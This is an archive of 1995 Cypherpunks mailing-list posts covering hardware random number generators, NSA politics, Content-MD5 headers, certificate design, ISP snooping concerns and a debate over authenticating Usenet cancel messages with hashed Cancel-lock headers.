> domain names, the limit is supposed to be 256. In a mailto: just what
> is the limit of an RFC822 valid e-mail address?

  Yes, we couldn't get to this type of stuff in the 1.12 patch.  We will be
doing this sort of stuff in 2.0.

>   I will say that Netscape is a very robust program. I have created documents
> with 10,000 nested <UL> lists, and the program didn't dump. I have
> created forms with 10,000 selection widgets with overlong labels and variable
> names and it handled them (didn't diusplay them very well) However, I am
> a little weary of netscape allowing lists and forms having 10,000
> levels. For one thing, although the 10,000 nested lists didn't crash
> netscape, they did use up all the swap space on my computer except for
> 300k. A 10K byte document was able to exhaust 32megs of ram.

  On unix you can use the csh(1) limit builtin to limit the size
of your netscape process.  As I understand it, the Mac also has
such a thing.  I'm not sure about windows.  Maybe we should put
a preference in Netscape for how much heap memory to use...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 4 Oct 95 18:22:03 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: GSS sample/demo?
In-Reply-To: <199510050115.UAA16284@arnet.arn.net>
Message-ID: <199510050121.VAA28274@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Take a look at the kerberos 5 sources.  You can grab krb5 beta 5
from MIT:
	ftp://athena-dist.mit.edu/pub/ATHENA/kerberos

Read the appropriate README file for source download instructions

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 4 Oct 95 13:24:31 PDT
To: aproxy@hplyot.obspm.fr
Subject: New version of my privacy enhanced www proxy is out
Message-ID: <9510042024.AA16962@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I've thrown into the tclbin-0.6b1.tgz (ftp hplyot.obspm.fr/tcl)
MD5 checksums/digest support, improved server home page 
at http://hplyot.obspm.fr:6661/  that shows your headers,
ongoing support for POST method, online admin config, passwd...

The proxy now issue  "Content-Checksums: md5=xxxxxx"
headers for its stuff, I 'invented' that  syntax, any www guru to tell
me if it already exists under another form ? (i checked the
http docs at w3.org, found nothing)

I'm still waiting for comments and people to use it and start a
network

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

NORAD colonel Mossad cryptographic Chirac Pasqua mururoa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 4 Oct 95 18:25:17 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*) (fwd)
In-Reply-To: <199510031453.PAA12535@utopia.hacktic.nl>
Message-ID: <199510050125.VAA03636@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Nobody --

And everyone else --

Keep this sort of crap out of cypherpunks.

Anonymous writes:
> 
> NY Times, Oct 3, 1995, Business Employment Ad.
> 
> 1984 Sarajevo, Olympics; 1995 Sarajevo, Battleground
> 
> Every day in our world, new threats, new challenges, new
> missions emerge. The people of the Central Intelligence
> Agency are dedicated to meeting the missions of the day,




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 4 Oct 95 18:39:02 PDT
To: hallam@w3.org
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <9510031505.AA11622@zorch.w3.org>
Message-ID: <199510050138.VAA03661@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> There are plenty of other quantum phenomena which can be
> tapped. Essentially all one needs to do is to build a very high gain
> amplifier "baddly". The main difficulty is removing bias.

The main difficulty is that it is extremely hard to prove to yourself
that you are amplifying a quantum phenomenon and not deterministic
noise from the rest of the circuits in the machine or outside it. As
I've said repeatedly, its nearly impossible to get this wrong with a
radiation detecting mechanism, but its very very hard to get it right
with most common mechanisms.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 4 Oct 95 22:33:04 PDT
To: Matt Blaze <cypherpunks@toad.com
Subject: Re: Crypto APIs
Message-ID: <199510050532.WAA16394@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:29 PM 10/2/95 -0400, Matt Blaze wrote:
> It seems best to encourage the realistic
> side of NSA as much as possible...

Why? Surely the realists are more dangerous than the nuts.


> [...]
>
> In other
> words, the parts of the military that are concerned with actually
> securing communications want exactly what we want, and are just
> starting to realize it.

This does not necessarily protect our right to cryptography, any
more than it protects our right to full auto guns.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@iafrica.com>
Date: Wed, 4 Oct 95 14:00:39 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: New version of my privacy enhanced www proxy is out
In-Reply-To: <9510042024.AA16962@hplyot.obspm.fr>
Message-ID: <Pine.NEB.3.91.951004225636.439y-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> The proxy now issue  "Content-Checksums: md5=xxxxxx"
> headers for its stuff, I 'invented' that  syntax, any www guru to tell
> me if it already exists under another form ? (i checked the
> http docs at w3.org, found nothing)

RFC 1544 specifies the Content-MD5 header field for use with 
MIME-conformant messages.  It looks like this:

               Content-MD5:  Q2hlY2sgSW50ZWdyaXR5IQ==

--apb (Alan Barrett)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eamon Daly <eamon@cosc.canterbury.ac.nz>
Date: Wed, 4 Oct 95 03:09:55 PDT
To: cypherpunks@toad.com
Subject: Re:  NYT: WWW Usage Monitoring for Marketing
Message-ID: <199510041009.XAA02338@kiwi>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 03 Oct 1995, futplex@pseudonym.com (Futplex) wrote:

[snip]
>In his regular Advertising column, Stuart Elliott discusses the presentation
>of a report on the problem of "assuring accurate and comprehensive measurement
>of consumer exposure to advertisements that appear in interactive media like
>World Wide Web sites and on-line services."
[snip]

Could someone please scan this article and post it to the list, or email it
to me? Thanks.

Eamon Daly
eamon@cosc.canterbury.ac.nz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 4 Oct 95 15:39:36 PDT
To: Alan Barrett <barrett@iafrica.com>
Subject: Re: New version of my privacy enhanced www proxy is out
In-Reply-To: <9510042024.AA16962@hplyot.obspm.fr>
Message-ID: <9510042239.AA17348@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


(BCCed to aproxy list, to avoid followup troubles)
Alan Barrett writes:
 > > The proxy now issue  "Content-Checksums: md5=xxxxxx"
Btw i typoed, I use "Content-Checksum: md5=<hexa/ascii-output>"
like in "Content-Checksum: md5=0246be185424cc79b61f4a55b73362c1"
like does the "md5" and md5sum (pgp's contrib dir) programs
 > > headers for its stuff, I 'invented' that  syntax, any www guru to tell
 > > me if it already exists under another form ? (i checked the
 > > http docs at w3.org, found nothing)
 > 
 > RFC 1544 specifies the Content-MD5 header field for use with 
 > MIME-conformant messages.  It looks like this:
 > 
 >                Content-MD5:  Q2hlY2sgSW50ZWdyaXR5IQ==
Thanks very much for pointing out,

I don't like the fact they somehow hard wired the checksum/digest
algorithm in the keyword name, it is imo a bad idea, when you will want to
use another algorithm, also the rfc state that the checksum applies to
"canonical" form, the one I want applies to the "Content-Length" bytes
you read, whatever they are (no interpretation), and I don't like the
use of base64 which is not nice if you want to check with existing
md5,md5sum programs what you get.

I stepped meanwhile on a draft on authorization scheme using digest, 
which might be interesting... when implemented client side... more on
this later (ref:
http://www.ics.uci.edu/pub/ietf/http/draft-ietf-http-digest-aa-01.txt
see also
http://www.ics.uci.edu/pub/ietf/http/draft-ietf-http-mda-00.txt
for a "mediated digest" authentification/security scheme)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

genetic security Legion of Doom spy CIA munitions Serbian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: accw5@glen-net.ca (Ryan Douglas)
Date: Wed, 4 Oct 95 21:01:32 PDT
To: cypherpunks@toad.com
Subject: Mailing list
Message-ID: <199510050402.AAA22650@sparc1.glen-net.ca>
MIME-Version: 1.0
Content-Type: text/plain


I wish to join the mailing list         

accw5@glen-net.ca





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 5 Oct 95 00:55:26 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: NSA Realists v. Nuts (Was: Re: Crypto APIs)
In-Reply-To: <199510050532.WAA16394@blob.best.net>
Message-ID: <199510050757.DAA22982@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
# It seems best to encourage the realistic side of NSA as much as possible...

James Donald writes:
> Why? Surely the realists are more dangerous than the nuts.

One way to look at it is this:

Could a Nutty NSA carry out its Nutty Agenda ?

If they could, then we'd better hope someone at Fort Meade does a better job
of promoting a more Realistic (read: free-strong-crypto-friendlier) Agenda.

If they couldn't, then we should focus our energies against the Realistic
Agenda, on the theory that the best NSA agenda is no agenda at all.

(I'm assuming that a Realistic Agenda has at least as good a chance of success
as a Nutty Agenda. If neither has a chance of success, then the distribution
of power among factions in the NSA is obviously irrelevant.)

Personally, I'm plenty cynical enough to fret about a possibility that the
Nuts might achieve their aims to some significant degree. So I'm inclined to
agree with Matt that cheering on the Realists is a wise strategy. 

I'm not sure how much luck we'll have convincing each other about the likely
outcome of the imposition of a Nutty Agenda on the U.S. Looks to me as though
they've imposed some pretty Nutty stuff on us already. Sure, some folks flaunt
the ITARs, but many (like me) fear them. Chalk up a win for the NSA Nuts in my
book.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 5 Oct 95 01:13:41 PDT
To: cypherpunks@toad.com
Subject: Macneil-Lehrer tonight.
Message-ID: <199510050811.EAA00416@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Whitfield Diffie, Dan Farmer, and another Sun Microsystem guy
whose name I can not spell but who tracked down Kevin Mitnik
are on the Newshour right now.
JMR
No PGP .sig
Regards, Jim Ray

 "Every act of visibility is an act of resistance." Suzanne Pharr
- -----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
- -----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHOTMCoZzwIn1bdtAQHsDQF/ZUbX7FTGpQRuuS/vyPIBqlPO9ovW26un
Q5CalRK8OSwX1IuNG0H9Nqj14QhsAfnd
=qUCL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Thomas" <jathomas@netcom.com>
Date: Thu, 5 Oct 95 05:41:42 PDT
To: cypherpunks@toad.com
Subject: Simple hardware RNGs
Message-ID: <Pine.3.89.9510050530.A5942-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


Having built devices for generating random data, I can tell you the 
problem is more difficult than it appears.  The problem is removing 
biases and correlations from the process.

A good place to start is Murry, Herschell, "A General Approach for 
Generating natural Random Variables", IEEE Transactions on Computers, 
December 1970, p. 1210-1213.

---------------------------------------------------------------------
John A. Thomas          | (214) 263-4351   | jathomas@netcom.com
Bowles & Thomas, L.L.P. |      Voice       | CompuServe 75236,3536
410 N.W Eleventh St.    | (214) 262-6520   | 
Grand Prairie, Tx 75050 |       Fax        | PGP public key available
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Oct 95 07:34:08 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <199510051433.HAA11813@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:
> > > It seems best to encourage the realistic side of NSA as much as
> > > possible...

James Donald writes:
> > Why? Surely the realists are more dangerous than the nuts.

At 03:57 AM 10/5/95 -0400, Futplex wrote:
> (I'm assuming that a Realistic Agenda has at least as good a chance 
> of success as a Nutty Agenda. [...] )

Language problem:

If that is the case, then the "Nutty Agenda" is perfectly sane.  They 
want to rule over us.  There is nothing crazy about that. Evil yes.  
Crazy no.  Their objective is to create a surveillance state, where 
all actions are known and recorded by the state, in order to 
facilitate detailed state control over every aspect of our lives.  Our 
agenda is the opposite.  There is no commonality of purpose, hence no 
possibility of cooperation.   
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Oct 95 07:34:16 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <199510051434.HAA11824@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:11 PM 10/5/95 +1000, David Gerard wrote:
> One thing that occurs to me: suppose I go to control, collect cancel messages,
> and build myself a collection of M1's that will work with a given M2?
>
> That is, I can't actually invert the hashing function. But if a given
> hash function is standard, then I can eventually build up a collection of
> M1s for M2s that will let me cancel quite a few things I may want to.
> How many cancel messages come through in a day?

Considerably less than 340,000,000,000,000,000,000,000,000,000,000,000,000

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 5 Oct 95 07:36:05 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <44pmiq$h7t@segfault.monkeys.com>
Message-ID: <FXyHcD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <45040d$8cd@cougar.vut.edu.au>, gerdw@cougar.vut.edu.au (David Gerard) writes:

>One thing that occurs to me: suppose I go to control, collect cancel messages,
>and build myself a collection of M1's that will work with a given M2?
>
>That is, I can't actually invert the hashing function. But if a given
>hash function is standard, then I can eventually build up a collection of
>M1s for M2s that will let me cancel quite a few things I may want to.

Good point -- if M1 is known to be small in size (say, a 128-bit MD5 of the
article body + newsgroups + message-id + date + secret passphrase), then an
organization with a lot of $$$$$$$ and computing resources (like Co$ or NSA)
might even try to pre-compute M2 = H(M1) for many possible M1's, sort the
result by M2, and build a (partial) lookup table of inverted H. This would be a
humongous table. Would someone bother to do it just to cancel a few Usenet
messages? Possibly.

But I see an easy fix: change Hujskonen and Franz's original proposal so that
an article posted with message-id X contains the header "Cancel-lock: M2",
where M2 is now H(X + M1), not just H(M1). This way, even if two different
articles happen to share the lock M2, they'll need different keys M1's to be
cancelled because their unique message-id's are different. A pre-computed table
of inverse values of H would be useless. To cancel a given X, a brute force
attacker would have to compute M2 = (X + M1) for all possible M1's. Hopefully,
the article X will expire naturally long before this can be done. :)

And in article <9510042317.AA14344@sulphur.osf.org>, Rich Salz <rsalz@osf.org> writes:

>>If the cancel cannot be authenticated (e.g., because the original article lacks
>>the "Cancel-lock: M2" header, or the cancel lacks the "Cancel-key: M1" header
>>such that H(M1)=M2), then INN should forward the unauthenticated cancel to one
>>or more "collection centers" so the author of the original article may be
>>notified.
>
>So if 70% of Usenet follows this scheme a handful of forged cancels can easily
>cause melt down.

(Thank you for looking at this!)

If 70% of Usenet followed this convention and refused to honor unauthenticated
cancels and supersedes's, then forged cancels would be much less harmful than
they are now, and there would be less need to notify the victims and to track
down the perpetrators.

Perhaps, not _every site should send out notifications. The purpose of getting
notifications from multiple sites is to compare the Path: header and see where
it was forged. I suppose notifications from just 5--10 well-positions sites
would often suffice. But if these sites are well-known, then an attacker might
put their names in the Path: of the forged cancel, to bypass the notification
and still propagate the cancel to a lot of other sites.

We can start implementing this scheme gradually, first by patching our posting
software to insert the "Cancel-lock:/Cancel-Key:" headers, and by running a few
"watchers" based on Homer Wilson Smith's Lazarus that'll notify the poster when
an article with a Cancel-lock: header is being cancelled without a matching
Cancel-Key: -- in all newsgroups, not just in a.r.s. Notifications about
articles without a "Cancel-Key:" header can be added much later, if ever.

>>Each "collection center" deamon should wake up periodically (say, every hour),
>>group the collected unauthenticated cancels by message-ids of the cancelled
>>articles, and e-mail the (distinct) addresses (other than "usenet@*" or
>>"news@*") mentioned in the "From:", "Sender:", "Authorized:", and
>>"X-Cancelled-By:" headers, quoting the unauthenticated cancel and the Path's as
>>seen at many different sites that forwarded the cancels. This way, if the
>>unauthenticated cancel is indeed forged, its author will see within hours that
>>it has been fraudulently cancelled _and_ will automatically receive enough
>>"Path:" samples from all over the world to see where it was posted, by
>>comparing the "Path:" headers in several forwarded copies.
>
>I can post a handful of articles and forge the From line, and create my
>own Cancel-lock headers by "rolling the dice."  I can then get their mailbox
>bombed by forging cancels.  A little more complicated then "sendsys-bombing"
>but not much more so.

Yes -- someone can post an article with random noise in the Cancel-lock:
header, and it would be impossible to cancel except by NoCeM.

As for mailbombing, one can do it much easier by forging a sendsys in the
victim's name, or by e-mailing the victim megabytes of junk from a phoney
"From:" address. This is done, but not too often because the perp is likely to
be tracked down and beaten up. :) Why would someone use this attack and not
straight forged sendsys?

One could address this by limiting the number of notifications e-mailed to one
address or even to one site in a period of time.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Oct 95 08:40:24 PDT
To: cypherpunks@toad.com
Subject: Certificates, Attributes, Web of Trust
Message-ID: <199510051540.IAA23596@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl and I and others have been discussing whether the Web of Trust
ought to use certificates to tie keys to people or attributes.
It's taken a while to sink in, but I now think he's basically right :-) ;
on the other hand, it can also still be done using the ugly X.509 format.
This means that we can begin to go out and corrupt users who might otherwise
want Driver's Licenses for the Infotainment Superhighway into realizing
that the Net can give them _more_ privacy instead of less.

>Alternatively, I can have First Security Bank open account 01732 for me and
>create a certificate binding my public key to that account number.  Now, I
>can use that key to sign anonymous checks.  (The bank knows me, perhaps,
>but the payee doesn't need to.)  

Yeah.  Consider a slightly-abused Distinguished Name for a checking or
credit card.
/Account=01732/Type=Checking/Org=FooBank/Country=com/ with key aaa
signed  /Title=Accountsigner/Org=FooBank/Country=com/ with key bbb
        signed  /Title=MasterKey/Org=FooBank/Country=Com/ with key mmm
                signed  /OU=Corporate/O=Verisign/Country=com/ with key vvv

When you sign a check/credit card today, your name and signature are there
as vague verification for the payee and bank that it's authentic; with digital
signatures, the fact that you can sign a note saying "Pay $X to $Y Signed aaa"
is all the verification they need, though the name business makes it easier
for them
to find what attributes the signer had and how to get the actual money...
Even the account number could be the public key instead, but that's pretty long.
(Credit cards may be a slight wrinkle, since there are lots of laws about them.)

What the name also gives you is a handle to hang marketing data on.  Sometimes,
you may have that data from the transaction (card cccccc wanted 5 plutonium
widgets sent to Resident, 1600 Penn.Ave, WashDC 20017), sometimes you've got
less
(card cccccc wants to receive results of a stock search at IP address
199.35.212.164,
which is way less since that's just a Netcom port server :-)  

So a credit card or checking account with just an account number and key
gives you
_far_ more privacy than a current conventional one - even if it's not the full
mathematically subpoena-proof privacy that Chaumian digicash could give.

And if your bank wants to offer extra privacy, it can let you create
sub-accounts -
send a request for "Create Sub-account Key SSS Account AAA Parameters
p1,p2,p3" signed aaa,
and it sends you a new certificate /Account=NewUnique#/etc. with key SSS
signed by bbb.
So you can give everybody a different-looking check, at least if the cost is
low.

[> Key signing "I use this name" vs. names not being able to sign "I use
this key"]
I still think you often want both directions, especially for privacy.
(For authentication, anybody who's got the attribute you want or claim will
often do;
for privacy, you really want to identify the _person_ you're talking to,
so the attribute "where the _real_ Carl Ellison gets his mail" is important.
Pseudonyms have an easier time of this, as long as they start using their keys
at the same time as their names.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Oct 95 08:40:36 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <199510051540.IAA23612@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 10/4/95 EDT, dlv@bwalk.dm.com (Dr. Dimitri Vulis) wrote:
>When an article is posted, two quantities are computed by the posting program:
>M1 = H(article body + newsgroups + message-id + date + passphrase) and
>M2 = H(M1). The posted article contains the header "Cancel-lock: M2".
>[.. Cancel-key: M1 to cancel or supersede.]
>[..Daemons forward suspected forged cancels to originator]

Aside from the forged-From:-bogus-cancel spam /r$ proposed, this has
the problem that it still only allows the originator to cancel a message,
and not either the moderator of a moderated group or a Good Spam-canceller
like CancelMoose, as well as stopping censors and cancel-spammers.

Cancellation is a sufficiently local-policy-dependent issue, and reasonably
low volume compared to the rest of news, that it probably makes sense for
the various news programs to hand cancellation requests off to an external
program, which can be locally modified as desired.

One approach is to add digital signature and verification capability
to News, at least to support cancels; doing this in an outboard
cancel-daemon is obviously easier.  RIPEM-SIG is a signature-only
version of RIPEM which is exportable, probably just in binaries. 
The local cancel-daemon could accept cancellation requests that were signed
by anybody on the list of locally-approved cancellers; one site could accept
cancels from Cancelmoose, newsgroup moderators, and Helena Kobrin;
another could do authors only.  This would, of course, encourage people
to get their digital signatures out there to allow themselves to cancel
their own messages.


----------------
BTW, on the general topic of spam, I got a nice note back from the
Johnson-Grace folks saying they were sorry they posted their
ad/announcement to the list and it won't happen again.
And you can download their compression stuff from www.jgc.com but they're
not actually making the algorithms public...
-----

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Oct 95 05:54:41 PDT
To: cypherpunks@toad.com
Subject: $BN_air
Message-ID: <199510051254.IAA24947@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-5-95. FTPeach:


   "A David and Goliath fight, the battle between Netscape and
   Microsoft over software for the Internet."

      For all of his success in outwitting the likes of IBM to
      become the leader of the world's biggest software
      company, Bill Gates has long said that the competition
      he most feared would come from a software start-up with
      breakthrough, innovative technology. Netscape
      Communications may be such a company. But a war over
      technology standards, which could delay the progress of
      electronic commerce and potentially impede Netscape's
      growth, now seems inevitable. Netscape's hand has been
      weakened by recent incidents in which flaws in the
      security features of its browser software were
      discovered by two "cyberpunks" [sic].


   $BN_air  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Oct 95 05:55:53 PDT
To: cypherpunks@toad.com
Subject: xus_ORN
Message-ID: <199510051255.IAA25049@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-5-95. Wash Rag:


   "Congress Debates Adding Smaller Spy Satellites to NRO's
   Menu."

      Top members of the House and Senate intelligence
      committees are carrying on a behind-the scenes debate
      over the nation's spy satellite system, with one group
      arguing that the governmeat could save hundreds of
      millions of dollars by building a new generation of
      small satellites to be launched in place of some of the
      big ones already planned. The Combest group wants to
      start production now of 2,000-pound space vehicles, each
      costing about $100 million and nicknamed "small-sats."


   "$1.6 Billion in NRO Kitty Helped Appropriators Fund Pet
   Projects."

      On the morning of Sept. 21, security men bustled around
      Room H-140 on the first floor of the Capitol, sweeping
      it to ensure that the space was free of electronic
      eavesdropping devices. This year's session turned out to
      be different from any in recent memory. The conferees
      took more than $1 billion from the once-sacrosanct spy
      satellite program of the National Reconnaissance Office
      (NRO) to help make room in the budget to speed up
      purchases of hundreds of millions of dollars worth of
      big-ticket defense items, including the B-2 "stealth"
      bomber.


   xus_ORN  (17 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Oct 95 09:18:36 PDT
To: gerdw@cougar.vut.edu.au (David Gerard)
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <199510051618.JAA26781@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:11 PM 10/5/95 +1000, you wrote:
>One thing that occurs to me: suppose I go to control, collect cancel messages,
>and build myself a collection of M1's that will work with a given M2?

MD5 produces a very random 128-bit output; you're not going to collect
any appreciable fraction of the 2**128 possible M2s.  As long as M1 is
even as simple as MD5(messageid,passphrase), it's pretty open territory.

Targeted attacks, however, are still possible, as long as M1 retains
the form MD5(known-stuff, passphrase) - assuming the user uses one of the
few hundred million wimpiest passphrases, you can search that moderately fast;
if you're willing to burn some resources, you might be able to take out
most of alt.religion.spam, at least until people use better passphrases.

The amount of work depends somewhat on whether you use
MD5(known-stuff, passphrase) or MD5(passphrase,known-stuff).
For the first case, the cracker would calculate the MD5 context
after doing known-stuff (once) and then grind away on passphrases.
For the second, the cracker could pre-compute a table of MD5 context
for the wimpy password list, and then add known-stuff to each.
Since known-stuff is probably longer than passphrases here,
the latter is probably more secure for this application.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 5 Oct 95 09:26:42 PDT
To: cypherpunks@toad.com
Subject: Rethinking the utility of netnews "cancel" control messages
Message-ID: <v02110103ac99b201cba4@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


The day of unauthenticated netnews control messages of any kind is
basically over. We gotta:

1. turn off all automated system-wide control of netnews, or

2. properly authenticate all such messages (newgroup, rmgroup, cancel, etc.).

I think we also ought to think carefully about continuing to have a
"cancel" control message (and the Supercedes: header) any more,
authenticated or not - as useful as this mechanism occasionally is to
remove unsightly spams (and other Officially Troublesome Material), isn't
this kind of casual revisionism something that is, historically, to be
avoided?

If you had a netnews system which simply marked a message as cancelled in
some way, would you set your netnews reader to seek out cancelled messages?
Or ignore them?

If you were a librarian or historian operating The Official USENET Archive
of Everything, would you accept and process cancel control messages?

        "Backbone cabal? What's that?"

        Erik Fair <fair@noc.use.net>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Rollins <trollins@hns.com>
Date: Thu, 5 Oct 95 07:19:18 PDT
To: doug@ss7.digex.net
Subject: Re: Oct 14 meeting Agenda? (DC Cypherpunks)
Message-ID: <199510051418.KAA00604@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


>>I figure that as long as we are going to receive...
>>       ? a commercial message from Digex ?
>>
>>We might be able to tap their knowledge base in assesing
>>the various risks and rewards available by using a Commercial
>>ISP.
>>
>>After all, with the FBI and Scientologists waging war on
>>the Internet ( capturing keystroaks, siezing computers,
>>and rummaging through everyones E-mail ), There may be a
>>way to make life a little more interesting for them.

>I will be glad to send in my two cents worth - I am not sure that
>I understand the question though.

While, I believe in strong crypto for everyone (what cypherpunks doesn't),
I also believe that much can be done to prevent the wholesale snooping
of Commercial ISP customers data.  I believe that this data is snooped
because the ISP's and large number of customers (ignorant of security)
make this data too easy a target (cost effective).

While the NSA may follow it's motto (In GOD we trust, the rest we monitor).
Others may take hostile actions agenst someone whose password or
personal information has been obtained. (ex. drain bank account, or just
send spam)

Some questions that I would like to ask...

1 - Assuming that someone from an agengy or someone pretending to
    be from an agency wanted to capture one or all the ISP customers
    key presses.  What method would they use ?

    Would they capture the data at the phone company?
    Would they tap the raw data stream at the initial ISP router ?
    Would they route IP packets from the initial ISP router through their
        own equipment before arriving at the ISP maching running the shell
        account ?
    Would they use a Trojin Shell (or telnetd) on a shell account ?
    Would they inform the ISP and get his help or root access ?

2 - What methods could be put into place by the ISP or it's customers
    to help prevent this snooping activity ?

    Perhaps an alternative login method (like deslogin or idealogin)
        trying to protect data through the phone company and IP route
        to the target machine.
